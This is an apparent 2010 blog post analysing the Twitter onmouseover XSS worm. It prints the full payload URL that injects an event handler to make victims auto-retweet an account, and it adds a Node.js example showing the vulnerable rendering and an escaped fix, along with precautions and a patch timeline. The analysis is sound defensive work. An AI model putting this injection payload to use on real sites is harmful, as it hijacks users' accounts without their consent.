XSS Worm Spreads on Twitter

A few minutes ago I logged into my Twitter account, and a suspicious piece of JavaScript code was visible at the top of the page, looking like the one in this image:

Image

After a quick analysis, I noticed that if you log in to your Twitter account and move your mouse pointer over a link, you trigger the JavaScript code, which retweets a specific Twitter account named “Matsta”. The following image shows an example of a retweet made after the mouse pointer was moved over a link (yes, I did that too… doh!):

Image

The extracted code is this:

http://t.co/@%22onmouseover=%22document.getElementById(%27status%27).value=%27RT%20Matsta%27;$(%27.status-update-form%27).submit();%22class=%22modal-overlay%22/

We can pick out the useful strings from the above code:

onmouseover=

This is an HTML event handler attribute: to activate the code, you only need to move your mouse pointer over the link.

value='RT Matsta'

When you move your mouse pointer over a link while logged into your Twitter account, your account posts a new RT (retweet) pointing to the Twitter account of the user “Matsta”, as seen in this picture:

Image
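As an added illustration (not code from the original post, and not Twitter's actual code), here is the rendering bug the link above relies on, in Node.js: the decoded link is written straight into an href attribute, so the %22 quote closes the attribute and the rest of the string becomes new onmouseover and class attributes, while escaping the value before insertion keeps the whole string inside href. The two render functions and the small attribute extractor are my own assumptions about how such a link gets emitted.

```javascript
// Added example: vulnerable vs. hardened rendering of a user-supplied link.
// The render functions are hypothetical; they are not Twitter's code.

// The link from the post, URL-encoded as it was stored.
const WORM_LINK = "http://t.co/@%22onmouseover=%22document.getElementById(%27status%27).value=%27RT%20Matsta%27;$(%27.status-update-form%27).submit();%22class=%22modal-overlay%22/";

// Vulnerable rendering: the decoded URL is dropped straight into the href
// attribute. The decoded " closes href, and what follows is parsed as
// further attributes (onmouseover=..., class=...).
function renderLinkUnsafe(url) {
  const decoded = decodeURIComponent(url);
  return `<a href="${decoded}">${decoded}</a>`;
}

// Escape the five characters that can change meaning inside an attribute
// value or a text node.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same markup, but the value is escaped so the quote
// cannot terminate the attribute, and only http(s) URLs become links.
function renderLinkSafe(url) {
  const decoded = decodeURIComponent(url);
  if (!/^https?:\/\//i.test(decoded)) return escapeHtml(decoded);
  const safe = escapeHtml(decoded);
  return `<a href="${safe}">${safe}</a>`;
}

// Minimal attribute-name extractor for the <a> start tag, to show which
// attributes a browser would end up with in each case.
function attributeNames(html) {
  const tag = html.match(/^<a\s([^>]*)>/);
  if (!tag) return [];
  return [...tag[1].matchAll(/([a-zA-Z][\w-]*)\s*=\s*"/g)].map((m) => m[1].toLowerCase());
}

console.log(attributeNames(renderLinkUnsafe(WORM_LINK))); // [ 'href', 'onmouseover', 'class' ]
console.log(attributeNames(renderLinkSafe(WORM_LINK)));   // [ 'href' ]
```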

Precautions

For the XSS attack to work, JavaScript must be enabled in your browser, so a very basic precaution is to disable JavaScript in your browser, which can be done easily with the NoScript add-on. We also recommend not logging in to Twitter until the XSS vulnerability has been completely fixed.

Unwanted ReTweets

If you have suspicious retweets in your Twitter account, you can simply log in to Twitter later, once the XSS has been fixed, and remove the unwanted retweets manually.

Status

21/09/2010 @ 15:35 PM GMT+1 = XSS Worm is still live
21/09/2010 @ 16:20 PM GMT+1 = PROBLEM HAS BEEN FIXED

http://twitter.com/safety:

The XSS attack should now be fully patched and no longer exploitable.

Change Password

I would advise anyone who used Twitter during the XSS attack to change their password to a stronger one.